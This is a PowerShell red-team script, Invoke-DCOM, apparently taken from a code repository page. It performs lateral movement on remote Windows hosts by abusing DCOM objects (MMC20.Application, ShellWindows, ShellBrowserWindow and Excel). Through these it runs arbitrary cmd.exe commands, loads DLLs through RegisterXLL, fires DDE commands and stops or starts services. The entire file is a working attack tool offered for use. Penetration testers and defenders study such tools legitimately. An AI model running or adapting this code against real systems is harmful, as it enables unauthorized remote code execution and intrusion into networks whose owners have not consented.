201 lines
6.2 KiB
PowerShell
201 lines
6.2 KiB
PowerShell
<#
|
|
|
|
DCOM Lateral Movement
|
|
Author: Steve Borosh (@rvrsh3ll)
|
|
License: BSD 3-Clause
|
|
Required Dependencies: None
|
|
Optional Dependencies: None
|
|
|
|
#>
|
|
|
|
function Invoke-DCOM {
|
|
<#
|
|
.SYNOPSIS
|
|
|
|
Execute's commands via various DCOM methods as demonstrated by (@enigma0x3)
|
|
http://www.enigma0x3.net
|
|
|
|
Author: Steve Borosh (@rvrsh3ll)
|
|
License: BSD 3-Clause
|
|
Required Dependencies: None
|
|
Optional Dependencies: None
|
|
|
|
.DESCRIPTION
|
|
|
|
Invoke commands on remote hosts via MMC20.Application COM object over DCOM.
|
|
|
|
.PARAMETER ComputerName
|
|
|
|
IP Address or Hostname of the remote system
|
|
|
|
.PARAMETER Method
|
|
|
|
Specifies the desired type of execution
|
|
|
|
.PARAMETER Command
|
|
|
|
Specifies the desired command to be executed
|
|
|
|
.EXAMPLE
|
|
|
|
Import-Module .\Invoke-DCOM.ps1
|
|
Invoke-DCOM -ComputerName '192.168.2.100' -Method MMC20.Application -Command "calc.exe"
|
|
Invoke-DCOM -ComputerName '192.168.2.100' -Method ExcelDDE -Command "calc.exe"
|
|
Invoke-DCOM -ComputerName '192.168.2.100' -Method ServiceStart "MyService"
|
|
#>
|
|
|
|
[CmdletBinding()]
|
|
Param (
|
|
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeLine = $true, ValueFromPipelineByPropertyName = $true)]
|
|
[String]
|
|
$ComputerName,
|
|
|
|
[Parameter(Mandatory = $true, Position = 1)]
|
|
[ValidateSet("MMC20.Application", "ShellWindows","ShellBrowserWindow","CheckDomain","ServiceCheck","MinimizeAll","ServiceStop","ServiceStart",
|
|
"DetectOffice","RegisterXLL","ExcelDDE")]
|
|
[String]
|
|
$Method = "MMC20.Application",
|
|
|
|
[Parameter(Mandatory = $false, Position = 2)]
|
|
[string]
|
|
$ServiceName,
|
|
|
|
[Parameter(Mandatory = $false, Position = 3)]
|
|
[string]
|
|
$Command= "calc.exe",
|
|
|
|
[Parameter(Mandatory = $false, Position = 4)]
|
|
[string]
|
|
$DllPath
|
|
|
|
)
|
|
|
|
Begin {
|
|
|
|
#Declare some DCOM objects
|
|
if ($Method -Match "ShellWindows") {
|
|
|
|
[String]$DCOM = '9BA05972-F6A8-11CF-A442-00A0C90A8F39'
|
|
}
|
|
|
|
elseif ($Method -Match "ShellBrowserWindow") {
|
|
|
|
[String]$DCOM = 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
|
|
}
|
|
|
|
elseif ($Method -Match "CheckDomain") {
|
|
|
|
[String]$DCOM = 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
|
|
}
|
|
|
|
elseif ($Method -Match "ServiceCheck") {
|
|
|
|
[String]$DCOM = 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
|
|
}
|
|
|
|
elseif ($Method -Match "MinimizeAll") {
|
|
|
|
[String]$DCOM = 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
|
|
}
|
|
|
|
elseif ($Method -Match "ServiceStop") {
|
|
|
|
[String]$DCOM = 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
|
|
}
|
|
|
|
elseif ($Method -Match "ServiceStart") {
|
|
|
|
[String]$DCOM = 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'
|
|
}
|
|
}
|
|
|
|
|
|
Process {
|
|
|
|
#Begin main process block
|
|
|
|
#Check for which type we are using and apply options accordingly
|
|
if ($Method -Match "MMC20.Application") {
|
|
|
|
$Com = [Type]::GetTypeFromProgID("MMC20.Application","$ComputerName")
|
|
$Obj = [System.Activator]::CreateInstance($Com)
|
|
$Obj.Document.ActiveView.ExecuteShellCommand($Command,$null,$null,"7")
|
|
}
|
|
elseif ($Method -Match "ShellWindows") {
|
|
|
|
$Com = [Type]::GetTypeFromCLSID("$DCOM","$ComputerName")
|
|
$Obj = [System.Activator]::CreateInstance($Com)
|
|
$Item = $Obj.Item()
|
|
$Item.Document.Application.ShellExecute("cmd.exe","/c $Command","c:\windows\system32",$null,0)
|
|
}
|
|
|
|
elseif ($Method -Match "ShellBrowserWindow") {
|
|
|
|
$Com = [Type]::GetTypeFromCLSID("$DCOM","$ComputerName")
|
|
$Obj = [System.Activator]::CreateInstance($Com)
|
|
$Obj.Document.Application.ShellExecute("cmd.exe","/c $Command","c:\windows\system32",$null,0)
|
|
}
|
|
|
|
elseif ($Method -Match "CheckDomain") {
|
|
|
|
$Com = [Type]::GetTypeFromCLSID("$DCOM","$ComputerName")
|
|
$Obj = [System.Activator]::CreateInstance($Com)
|
|
$Obj.Document.Application.GetSystemInformation("IsOS_DomainMember")
|
|
}
|
|
|
|
elseif ($Method -Match "ServiceCheck") {
|
|
|
|
$Com = [Type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","$ComputerName")
|
|
$Obj = [System.Activator]::CreateInstance($Com)
|
|
$obj.Document.Application.IsServiceRunning("$ServiceName")
|
|
}
|
|
|
|
elseif ($Method -Match "MinimizeAll") {
|
|
|
|
$Com = [Type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","$ComputerName")
|
|
$Obj = [System.Activator]::CreateInstance($Com)
|
|
$obj.Document.Application.MinimizeAll()
|
|
}
|
|
|
|
elseif ($Method -Match "ServiceStop") {
|
|
|
|
$Com = [Type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","$ComputerName")
|
|
$Obj = [System.Activator]::CreateInstance($Com)
|
|
$obj.Document.Application.ServiceStop("$ServiceName")
|
|
}
|
|
|
|
elseif ($Method -Match "ServiceStart") {
|
|
|
|
$Com = [Type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","$ComputerName")
|
|
$Obj = [System.Activator]::CreateInstance($Com)
|
|
$obj.Document.Application.ServiceStart("$ServiceName")
|
|
}
|
|
elseif ($Method -Match "DetectOffice") {
|
|
|
|
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
|
|
$Obj = [System.Activator]::CreateInstance($Com)
|
|
$isx64 = [boolean]$obj.Application.ProductCode[21]
|
|
Write-Host $(If ($isx64) {"Office x64 detected"} Else {"Office x86 detected"})
|
|
}
|
|
elseif ($Method -Match "RegisterXLL") {
|
|
|
|
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
|
|
$Obj = [System.Activator]::CreateInstance($Com)
|
|
$obj.Application.RegisterXLL("$DllPath")
|
|
}
|
|
elseif ($Method -Match "ExcelDDE") {
|
|
|
|
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
|
|
$Obj = [System.Activator]::CreateInstance($Com)
|
|
$Obj.DisplayAlerts = $false
|
|
$Obj.DDEInitiate("cmd", "/c $Command")
|
|
}
|
|
}
|
|
|
|
End {
|
|
|
|
Write-Output "Completed"
|
|
}
|
|
|
|
|
|
} |